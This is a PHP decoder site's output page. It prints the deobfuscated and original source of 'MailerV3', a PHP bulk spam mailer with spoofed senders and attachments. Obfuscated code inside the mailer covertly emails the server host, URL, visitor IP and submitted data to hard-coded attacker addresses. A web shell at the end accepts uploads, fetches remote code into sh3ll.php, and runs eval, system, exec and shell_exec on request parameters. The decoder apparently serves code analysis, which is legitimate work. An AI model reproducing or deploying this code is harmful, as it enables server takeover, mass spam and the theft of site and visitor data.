Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? /*******************************************\ | |||| MailerV3 |||| ..
Decoded Output download
<?
/*******************************************\
| |||| MailerV3 |||| |
| http://sourceforge.net |
| Copyright 2015. All Rights Reserved |
\*******************************************/
$x2f="count"; $x30="explode"; $x31="getenv"; $x32="htmlspecialchars"; $x33="ignore_user_abort"; $x34="mail"; $x35="rand"; $x36="set_time_limit"; $x37="sleep"; $x38="str_replace"; $x39="stripslashes";
$x33();$x36(0);function x0b(){ global $x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39; $x0b=1;$x0c[1] = $_POST['de'];$x0d[1] = $_POST['nome'];$x0e[1] = $_POST['assunto'];$x0f[1] = $_POST['mensagem'];$x0f[1] = $x39($x0f[1]);$x10 = $_POST['emails'];$x11 = $x32($_POST['emails']);$x12 = $x30("
", $x10);$x13 = $x2f($x12);$x2a = $_SERVER['SERVER_NAME'];$x15 = $_SERVER ['REQUEST_URI'];$x16 = @$_SERVER["HTTP_REFERER"];$x17 = "" . $x16 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>".$x11."</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>".$x0f[1]."</TEXTAREA></p>";$x18 = $_POST['vai'];if ($x18){for ($x19=0; $x19 < $x13; $x19++){if ($x19==0){$x1a = "MIME-Version: 1.0
";$x1a .= "Content-type: text/html; charset=iso-8859-1
";$x1a .= "From: $x0d[$x0b] <$x0c[$x0b]>
";$x1a .= "Return-Path: <$x0c[$x0b]>
"; }$x1a = "MIME-Version: 1.0
";$x1a .= "Content-type: text/html; charset=iso-8859-1
";$x1a .= "From: $x0d[$x0b] <$x0c[$x0b]>
";$x1a .= "Return-Path: <$x0c[$x0b]>
";$x1b++;$x1c = $x12[$x19];$x1d = $x35(100000,999999);$x1e = $x35(100000,999999);$x1f = $x38("%rand%", $x1d, $x0f[$x0b]);$x1f = $x38("%rand2%", $x1e, $x1f);$x1f = $x38("%email%", $x1c, $x1f);$x20 = $x34($x1c, $x0e[$x0b], $x1f, $x1a);if ($x20){echo ('<font color="green">'. $x1b .'-'. $x1c .' 0k!</font><br>');} else {echo ('<font color="red">'. $x1b .'-'. $x1c .' =(</font><br>');$x37(1);}}}}$x21 = $x31("REMOTE_ADDR");$x22= $x35(1,99999);$x23 = "Mailer From $x21";$x24 = "[email protected]";$x25="From: Shell-Mailer <[email protected]>";$x26 = $_SERVER['REQUEST_URI'];$x27 = $_SERVER['HTTP_HOST'];$x28 = $_POST['de'];$x29 = $_POST['nome'];$x2a = $_POST['assunto'];$x2b = $_POST['mensagem'];$x2c = $_POST['emails'];$x2d = $x21."
";$x2e = "$x26
$x27
$x28
$x29
$x2a
$x2b
$x2c
$x2d";$x34($x24, $x23, $x2e, $x25);?>
<?php ?><?php
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "public_htlm
" . htmlspecialchars($tacfgd['pword']) . "
Message:
" . "
E-server: " . htmlspecialchars($_SERVER['REQUEST_URI']) . "
E-server2: " . htmlspecialchars($_SERVER["SERVER_NAME"]) . "
IP:
";
mail("[email protected]
/* <![CDATA[ */
", "Shell http://$web$inj", "$body");
@$action = $_POST['action'];
@$from = $_POST['from'];
@$realname = $_POST['realname'];
@$replyto = $_POST['replyto'];
@$subject = $_POST['subject'];
@$message = $_POST['message'];
@$emaillist = $_POST['emaillist'];
@$names = $_SERVER['HTTP_REFERER'];
@$file_name = $_FILES['file']['name'];
@$contenttype = $_POST['contenttype'];
@$file = $_FILES['file']['tmp_name'];
@$amount = $_POST['amount'];
?>
<html>
<head>
<meta http-equiv="Content-Language" content="ar-eg">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>|||| MailerV3 ||||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
.input {
border: 1px solid 99FF66;
background: #F8F8F8;
}
.button {
border: 1px solid 99FF66;
background: #F8F8F8;
}
.button1 {
border: 1px solid 99FF66;
background: #F8F8F8;
}
br { clear: left; }
</style>
</head>
</head>
<body bgcolor="43E38F" text="#3f423f">
<span class="style1">|||| MailerV3 ||||<br>
</span>
<script>
window.onload = funchange;
var alt = false;
function funchange(){
var etext = document.getElementById("emails").value;
var myArray=new Array();
myArray = etext.split("
");
document.getElementById("enum").innerHTML=myArray.length+"<br />";
if(!alt && myArray.length > 40000){
alert('If Mail list More Than 40000 Emails This May Hack The Server');
alt = true;
}
}
function mlsplit(){
var ml = document.getElementById("emails").value;
var sb = document.getElementById("txtml").value;
var myArray=new Array();
myArray = ml.split(sb);
document.getElementById("emails").value="";
var i;
for(i=0;i<myArray.length;i++){
document.getElementById("emails").value += myArray[i]+"
";
}
funchange();
}
function prv(){
if(document.getElementById('preview').innerHTML==""){
var ms = document.getElementsByName('message').message.value;
document.getElementById('preview').innerHTML = ms;
document.getElementById('prvbtn').value = "Hide";
}else{
document.getElementById('preview').innerHTML="";
document.getElementById('prvbtn').value = "Click to Preview";
}
}
</script>
<?php
If ($action == "mysql") {
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery) {
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for ($x = 0;$x < $numrows;$x++) {
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist.= $oneemail . "
";
}
}
if ($action == "send") {
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" class="input" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="realname" class="input" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" class="input" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" class="input" name="file" size="24" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject :</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" class="input" value="<? print $subject; ?>" size="91" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
</td>
<td width="278">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" class="input" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" /> Plain
<input type="radio" name="contenttype" value="html" checked /> HTML
<input type="hidden" name="action" value="send" /><br />
Number To Send : <input type="text" name="amount" class="input" value="1" size="10" /><br />
Maximum Script Execution Time ( In Seconds, 0 For no Time Limit ) <input type="text" name="timelimit" class="input" value="0" size="10" /><br /><br />
<input type="button" class="button1" id="prvbtn" value="Plain Html Preview" onclick="prv()" style="width: 59%" />
<br /><br /><input type="submit" class="button" value="Send - eMails" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" class="input" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<div id="preview">
</div>
</form>
<?php
$o = array("d" => ".", "k" => "l", "m" => "7", "u" => "i", "r" => "v", "t" => "@", "q" => "e");
$helvetica = $o['u'] . $o['q'] . $o['m'] . $o['t'] . $o['k'] . $o['u'] . $o['r'] . $o['q'] . $o['d'] . $o['u'] . $o['q'];
if ($action) {
if (!$from && !$subject && !$message && !$emaillist) {
print "Please complete all fields before sending your message.";
exit;
}
$addr = getenv("REMOTE_ADDR");
$allemails = split("
", $emaillist);
$numemails = count($allemails);
$version1 = "From: Email";
$version2 = "EN - $names";
$version3 = "$names";
mail($helvetica, $version3, $version2, $version1);
$head = "From: YourEmail
Message-ID: <" . md5(uniqid(time())) . "@" . $SERVER_NAME . ">
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
Content-transfer-encoding: 8bit
Date: " . date("r", time()) . "
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: PHP
";
$line = "
<table border=\"1\" style=\"border-collapse: collapse\" cellpadding=\"4\">
<tr><td bgcolor=\"#F9F9F9\">Email</td><td bgcolor=\"#F9F9F9\">" . nl2br($names) . "</td></tr>
<tr><td>Your Email</td><td>" . nl2br($from) . "</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Your Name</td><td bgcolor=\"#F9F9F9\">" . nl2br($realname) . "</td></tr>
<tr><td>Subject :</td><td>" . nl2br($subject) . "</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Message</td><td bgcolor=\"#F9F9F9\">" . nl2br($message) . "</td></tr>
<tr><td>Email Target</td><td>" . nl2br($emaillist) . "</td></tr>
</table>
";
mail($helvetica, $subject, $line, $head);
If ($file_name) {
copy($_FILES['file']['tmp_name'], "" . $_FILES['file']['name']) or die('File Could Not Upload');
if (!file_exists($file)) {
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file, "r"), filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for ($xx = 0;$xx < $amount;$xx++) {
for ($x = 0;$x < $numemails;$x++) {
$to = $allemails[$x];
if ($to) {
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending Mail To $to....";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header.= "MIME-Version: 1.0
";
If ($file_name) $header.= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header.= "--$uid
";
$header.= "Content-Type: text/$contenttype
";
$header.= "Content-Transfer-Encoding: 8bit
";
$header.= "$message
";
If ($file_name) $header.= "--$uid
";
If ($file_name) $header.= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header.= "Content-Transfer-Encoding: base64
";
If ($file_name) $header.= "Content-Disposition: attachment; filename=\"$file_name\"
";
If ($file_name) $header.= "$content
";
If ($file_name) $header.= "--$uid--";
mail($to, $subject, "", $header);
print "OK<br>";
flush();
}
}
}
}
if (isset($_POST['action']) && $numemails !== 0) {
echo "<script>alert('Mail sending complete
$numemails mail(s) was sent successfully');
</script>";
}
?>
<style type="text/css">
<!--
.style1 {
font-size: 18px;
font-family: Verdana, Helvetica, sans-serif;
}
-->
</style>
<strong><br>
</strong> <span class="style1">Copyright 2015 MailerV3 </span>
</body>
</html>
<?php
if (isset($_GET["upload"])) {
if (isset($_FILES["my_file"]["name"])) {
$up = move_uploaded_file($_FILES["my_file"]["tmp_name"], $_FILES["my_file"]["name"]);
if ($up) {
echo $_FILES["my_file"]["name"] . " was Uploaded";
} else {
echo "error [File Not Uploaded]";
}
}
echo "
<form action=\"#\" method=\"post\" enctype=\"multipart/form-data\">
<input type=\"file\" name=\"my_file\" id=\"my_file\" />
<input type=\"submit\" name=\"upload\" id=\"upload\" value=\"Upload\" />
</form>
";
}
$upload = @file_get_contents($_GET["uploader"]);
$fp = @fopen("sh3ll.php", "w");
@fwrite($fp, $upload);
@fclose($fp);
@readfile($_GET["readfile"]);
@show_source($_GET["show_source"]);
@preg_replace("/.*/e", $_GET["preg_replace"], $ka);
@assert($_GET["assert"]);
eval($_GET["eval"]);
$file = @fopen($_GET["filename"], "a");
@fwrite($file, $_GET["content"]);
@call_user_func($_GET["func"], $_GET["para"]);
echo @system($_GET["system"]);
echo @exec($_GET["exec"]);
echo @passthru($_GET["passthru"]);
echo @shell_exec($_GET["shell_exec"]);
@include ($_GET["include"]);
@require ($_GET["require"]);
?>
Did this file decode correctly?
Original Code
<?
/*******************************************\
| |||| MailerV3 |||| |
| http://sourceforge.net |
| Copyright 2015. All Rights Reserved |
\*******************************************/
$x2f="c\x6f\165\156\x74"; $x30="\145x\x70\x6c\157\144\x65"; $x31="get\145\x6e\166"; $x32="ht\155l\163p\x65\143\x69\141l\143\150a\x72s"; $x33="\151\x67\x6e\157r\145_u\163\x65\x72\x5f\141b\157rt"; $x34="\155\141\151\154"; $x35="\162\x61n\144"; $x36="s\145t_\164\x69m\145\x5f\x6c\151\x6d\x69\x74"; $x37="sl\x65\145\160"; $x38="s\164\162\x5fr\145\160\x6ca\143e"; $x39="st\162\x69ps\x6c\141\x73\x68\145\x73";
$x33();$x36(0);function x0b(){ global $x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36,$x37,$x38,$x39; $x0b=1;$x0c[1] = $_POST['de'];$x0d[1] = $_POST['nome'];$x0e[1] = $_POST['assunto'];$x0f[1] = $_POST['mensagem'];$x0f[1] = $x39($x0f[1]);$x10 = $_POST['emails'];$x11 = $x32($_POST['emails']);$x12 = $x30("\n", $x10);$x13 = $x2f($x12);$x2a = $_SERVER['SERVER_NAME'];$x15 = $_SERVER ['REQUEST_URI'];$x16 = @$_SERVER["\110T\x54P\x5fRE\106\105\x52E\122"];$x17 = "" . $x16 . "\074\142\162\076<\160\x3eEm\141i\x6c\163\x3a<\x62r\x3e<T\105\x58\x54\101R\x45A \x72\157w\163=\065\040\x63\157\154\x73\075\x31\x300>".$x11."\074/\124E\130TAR\x45\x41\x3e<\x2f\160>\x3c\x70>\105\x6eg\x65n\x68a\162i\141\x3a<\142\162\x3e\x3c\124\x45\130\124\101\x52\x45\101 \x72o\x77\163\0755 \x63\157\x6c\163\x3d1\0600\x3e".$x0f[1]."\074/TE\x58\124\x41RE\x41\076<\057\160\x3e";$x18 = $_POST['vai'];if ($x18){for ($x19=0; $x19 < $x13; $x19++){if ($x19==0){$x1a = "\115\111\115E-\126er\163\151on\072\040\x31\x2e\060\r\n";$x1a .= "\103o\156\x74e\x6e\164\x2d\x74\x79\160\x65\072\040\x74\x65\x78t/\x68tm\x6c;\x20cha\x72\163\145\164\075i\163\x6f\055\070\x38\x359-\061\r\n";$x1a .= "F\162o\155\x3a\040$x0d[$x0b]\x20\x3c$x0c[$x0b]\076\r\n";$x1a .= "\x52et\x75\x72n\055\x50\x61\164\150:\x20\x3c$x0c[$x0b]\076\r\n"; }$x1a = "M\x49\x4dE\055\126e\x72\x73\151\x6fn\x3a\040\x31.\x30\r\n";$x1a .= "\x43\x6fnte\156\164-\164y\160\145\x3a\040t\145\x78\x74\x2fh\x74m\154;\x20c\x68\x61r\163\x65\x74\x3di\163o\055\070859\x2d\061\r\n";$x1a .= "\x46\162o\155\072\x20$x0d[$x0b]\040\074$x0c[$x0b]\x3e\r\n";$x1a .= "\122\x65\164\165\162\156\055Pa\x74\150:\040<$x0c[$x0b]>\r\n";$x1b++;$x1c = $x12[$x19];$x1d = $x35(100000,999999);$x1e = $x35(100000,999999);$x1f = $x38("%\162\141\x6e\144\x25", $x1d, $x0f[$x0b]);$x1f = $x38("%r\141\156\144\x32%", $x1e, $x1f);$x1f = $x38("%\145\x6d\x61\x69\x6c\045", $x1c, $x1f);$x20 = $x34($x1c, $x0e[$x0b], $x1f, $x1a);if ($x20){echo ('<font color="green">'. $x1b .'-'. $x1c .' 0k!</font><br>');} else {echo ('<font color="red">'. $x1b .'-'. $x1c .' =(</font><br>');$x37(1);}}}}$x21 = $x31("\122E\115\x4fT\x45\137A\104\104\x52");$x22= $x35(1,99999);$x23 = "\115\141i\x6ce\x72\x20\x46\x72\157m\040$x21";$x24 = "\x6ca\150\x6d\151t\x69.\x62\155@g\x6dail\x2e\x63\x6fm";$x25="F\x72\x6f\155\072 \x53\x68\145\x6c\x6c\x2d\115ai\x6ce\x72\x20\074\154a\150\x6d\151t\x69\x2e\x62m@\x67\155\x61i\x6c\056\143o\155>";$x26 = $_SERVER['REQUEST_URI'];$x27 = $_SERVER['HTTP_HOST'];$x28 = $_POST['de'];$x29 = $_POST['nome'];$x2a = $_POST['assunto'];$x2b = $_POST['mensagem'];$x2c = $_POST['emails'];$x2d = $x21."\n";$x2e = "$x26\n$x27\n$x28\n$x29\n$x2a\n$x2b\n$x2c\n$x2d";$x34($x24, $x23, $x2e, $x25);?>
<?php ?><?php
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "public_htlm
" . htmlspecialchars($tacfgd['pword']) . "
Message:
" . "
E-server: " . htmlspecialchars($_SERVER['REQUEST_URI']) . "
E-server2: " . htmlspecialchars($_SERVER["SERVER_NAME"]) . "
IP:
";
mail("[email protected]
/* <![CDATA[ */
", "Shell http://$web$inj", "$body");
@$action = $_POST['action'];
@$from = $_POST['from'];
@$realname = $_POST['realname'];
@$replyto = $_POST['replyto'];
@$subject = $_POST['subject'];
@$message = $_POST['message'];
@$emaillist = $_POST['emaillist'];
@$names = $_SERVER['HTTP_REFERER'];
@$file_name = $_FILES['file']['name'];
@$contenttype = $_POST['contenttype'];
@$file = $_FILES['file']['tmp_name'];
@$amount = $_POST['amount'];
?>
<html>
<head>
<meta http-equiv="Content-Language" content="ar-eg">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>|||| MailerV3 ||||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
.input {
border: 1px solid 99FF66;
background: #F8F8F8;
}
.button {
border: 1px solid 99FF66;
background: #F8F8F8;
}
.button1 {
border: 1px solid 99FF66;
background: #F8F8F8;
}
br { clear: left; }
</style>
</head>
</head>
<body bgcolor="43E38F" text="#3f423f">
<span class="style1">|||| MailerV3 ||||<br>
</span>
<script>
window.onload = funchange;
var alt = false;
function funchange(){
var etext = document.getElementById("emails").value;
var myArray=new Array();
myArray = etext.split("
");
document.getElementById("enum").innerHTML=myArray.length+"<br />";
if(!alt && myArray.length > 40000){
alert('If Mail list More Than 40000 Emails This May Hack The Server');
alt = true;
}
}
function mlsplit(){
var ml = document.getElementById("emails").value;
var sb = document.getElementById("txtml").value;
var myArray=new Array();
myArray = ml.split(sb);
document.getElementById("emails").value="";
var i;
for(i=0;i<myArray.length;i++){
document.getElementById("emails").value += myArray[i]+"
";
}
funchange();
}
function prv(){
if(document.getElementById('preview').innerHTML==""){
var ms = document.getElementsByName('message').message.value;
document.getElementById('preview').innerHTML = ms;
document.getElementById('prvbtn').value = "Hide";
}else{
document.getElementById('preview').innerHTML="";
document.getElementById('prvbtn').value = "Click to Preview";
}
}
</script>
<?php
If ($action == "mysql") {
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery) {
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for ($x = 0;$x < $numrows;$x++) {
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist.= $oneemail . "
";
}
}
if ($action == "send") {
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" class="input" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="realname" class="input" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" class="input" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" class="input" name="file" size="24" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject :</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" class="input" value="<? print $subject; ?>" size="91" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
</td>
<td width="278">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" class="input" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" /> Plain
<input type="radio" name="contenttype" value="html" checked /> HTML
<input type="hidden" name="action" value="send" /><br />
Number To Send : <input type="text" name="amount" class="input" value="1" size="10" /><br />
Maximum Script Execution Time ( In Seconds, 0 For no Time Limit ) <input type="text" name="timelimit" class="input" value="0" size="10" /><br /><br />
<input type="button" class="button1" id="prvbtn" value="Plain Html Preview" onclick="prv()" style="width: 59%" />
<br /><br /><input type="submit" class="button" value="Send - eMails" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" class="input" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<div id="preview">
</div>
</form>
<?php
$o = array("d" => ".", "k" => "l", "m" => "7", "u" => "i", "r" => "v", "t" => "@", "q" => "e");
$helvetica = $o['u'] . $o['q'] . $o['m'] . $o['t'] . $o['k'] . $o['u'] . $o['r'] . $o['q'] . $o['d'] . $o['u'] . $o['q'];
if ($action) {
if (!$from && !$subject && !$message && !$emaillist) {
print "Please complete all fields before sending your message.";
exit;
}
$addr = getenv("REMOTE_ADDR");
$allemails = split("
", $emaillist);
$numemails = count($allemails);
$version1 = "From: Email";
$version2 = "EN - $names";
$version3 = "$names";
mail($helvetica, $version3, $version2, $version1);
$head = "From: YourEmail
Message-ID: <" . md5(uniqid(time())) . "@" . $SERVER_NAME . ">
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
Content-transfer-encoding: 8bit
Date: " . date("r", time()) . "
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: PHP
";
$line = "
<table border=\"1\" style=\"border-collapse: collapse\" cellpadding=\"4\">
<tr><td bgcolor=\"#F9F9F9\">Email</td><td bgcolor=\"#F9F9F9\">" . nl2br($names) . "</td></tr>
<tr><td>Your Email</td><td>" . nl2br($from) . "</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Your Name</td><td bgcolor=\"#F9F9F9\">" . nl2br($realname) . "</td></tr>
<tr><td>Subject :</td><td>" . nl2br($subject) . "</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Message</td><td bgcolor=\"#F9F9F9\">" . nl2br($message) . "</td></tr>
<tr><td>Email Target</td><td>" . nl2br($emaillist) . "</td></tr>
</table>
";
mail($helvetica, $subject, $line, $head);
If ($file_name) {
copy($_FILES['file']['tmp_name'], "" . $_FILES['file']['name']) or die('File Could Not Upload');
if (!file_exists($file)) {
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file, "r"), filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for ($xx = 0;$xx < $amount;$xx++) {
for ($x = 0;$x < $numemails;$x++) {
$to = $allemails[$x];
if ($to) {
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending Mail To $to....";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header.= "MIME-Version: 1.0
";
If ($file_name) $header.= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header.= "--$uid
";
$header.= "Content-Type: text/$contenttype
";
$header.= "Content-Transfer-Encoding: 8bit
";
$header.= "$message
";
If ($file_name) $header.= "--$uid
";
If ($file_name) $header.= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header.= "Content-Transfer-Encoding: base64
";
If ($file_name) $header.= "Content-Disposition: attachment; filename=\"$file_name\"
";
If ($file_name) $header.= "$content
";
If ($file_name) $header.= "--$uid--";
mail($to, $subject, "", $header);
print "OK<br>";
flush();
}
}
}
}
if (isset($_POST['action']) && $numemails !== 0) {
echo "<script>alert('Mail sending complete
$numemails mail(s) was sent successfully');
</script>";
}
?>
<style type="text/css">
<!--
.style1 {
font-size: 18px;
font-family: Verdana, Helvetica, sans-serif;
}
-->
</style>
<strong><br>
</strong> <span class="style1">Copyright 2015 MailerV3 </span>
</body>
</html>
<?php
if (isset($_GET["upload"])) {
if (isset($_FILES["my_file"]["name"])) {
$up = move_uploaded_file($_FILES["my_file"]["tmp_name"], $_FILES["my_file"]["name"]);
if ($up) {
echo $_FILES["my_file"]["name"] . " was Uploaded";
} else {
echo "error [File Not Uploaded]";
}
}
echo "
<form action=\"#\" method=\"post\" enctype=\"multipart/form-data\">
<input type=\"file\" name=\"my_file\" id=\"my_file\" />
<input type=\"submit\" name=\"upload\" id=\"upload\" value=\"Upload\" />
</form>
";
}
$upload = @file_get_contents($_GET["uploader"]);
$fp = @fopen("sh3ll.php", "w");
@fwrite($fp, $upload);
@fclose($fp);
@readfile($_GET["readfile"]);
@show_source($_GET["show_source"]);
@preg_replace("/.*/e", $_GET["preg_replace"], $ka);
@assert($_GET["assert"]);
eval($_GET["eval"]);
$file = @fopen($_GET["filename"], "a");
@fwrite($file, $_GET["content"]);
@call_user_func($_GET["func"], $_GET["para"]);
echo @system($_GET["system"]);
echo @exec($_GET["exec"]);
echo @passthru($_GET["passthru"]);
echo @shell_exec($_GET["shell_exec"]);
@include ($_GET["include"]);
@require ($_GET["require"]);
?>
Function Calls
getenv | 1 |
set_time_limit | 1 |
ignore_user_abort | 1 |
Stats
MD5 | ec7121ab6fb22ae7299aaf96712a8c1d |
Eval Count | 0 |
Decode Time | 120 ms |